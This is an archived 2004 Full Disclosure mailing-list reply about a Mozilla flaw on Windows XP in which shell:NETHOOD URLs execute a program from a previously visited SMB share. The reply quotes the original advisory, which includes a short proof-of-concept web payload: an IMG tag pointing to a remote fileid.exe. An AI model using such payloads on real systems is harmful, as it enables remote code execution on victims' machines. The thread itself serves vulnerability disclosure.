Full Disclosure mailing list archives
Re: MOZILLA: SHELL can execute remote EXE program
From: Barry Fitzgerald <bkfsec () sdf lonestar org>
Date: Fri, 09 Jul 2004 09:51:06 -0400
Interesting... I was trying to determine if the shell: exploit could be used to execute remote code on a known web server but hadn't approached it from the SMB angle.
The obvious mitigating factor for this exploit is that someone would need to have prior knowledge of which SMB shares had been visited by the user, or otherwise try to manipulate those. Unless a way to merge this flaw with an automated method of placing this shortcut into the nethood and controlling what content is on said share -- then this vulnerability would almost definately not be usable in widespread exploit.
It could be a danger in situations where the cracker has prior knowledge of the network environment, though.
-Barry
liudieyu () umbrella name wrote:
SUBJ: MOZILLA: SHELL can execute remote EXE program DATE: 2004/07/09 FROM: Liu Die Yu <liudieyu AT umbrella D0T name> ############################################################ [START] Advisory ############################################################ COPYRIGHT ---------This Advisory is Copyright (c) 2004 "Liu Die Yu". You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )TESTED ------MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616") running on winxp.en.home.sp1a.up2date.20040709PROCESS -------VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p". THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT"shell:NETHOOD" AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL: shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED. REFERENCE --------- MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url: http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html greetingz fly to perrymonj. WINDOWS support "shell:NETHOOD": http://does-not-exist.org/mail-archives/bugtraq/msg02171.html thanks to malware for his additional research , and Cheng Peng Su for his original discovery. liudieyu http://umbrella.name ############################################################ [START] PROOF OF CONCEPT ############################################################<!-- MOZILLA REMOTE COMPROMISE DEMOREPLACE "[" WITH "<", and REPLACE "]" WITH ">". !!!!! WARNING !!!!! THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION. PROCESS: 1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p". THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD" 2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE "shared" FOLDER. CREATED BY: "Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME COPYRIGHT:This Demo is Copyright (c) 2004 "Liu Die Yu". You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )--> [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MOZILLA: SHELL can execute remote EXE program liudieyu (Jul 08)
- Re: MOZILLA: SHELL can execute remote EXE program Barry Fitzgerald (Jul 09)
- Re: MOZILLA: SHELL can execute remote EXE program liudieyu (Jul 09)
- Re: MOZILLA: SHELL can execute remote EXE program Barry Fitzgerald (Jul 09)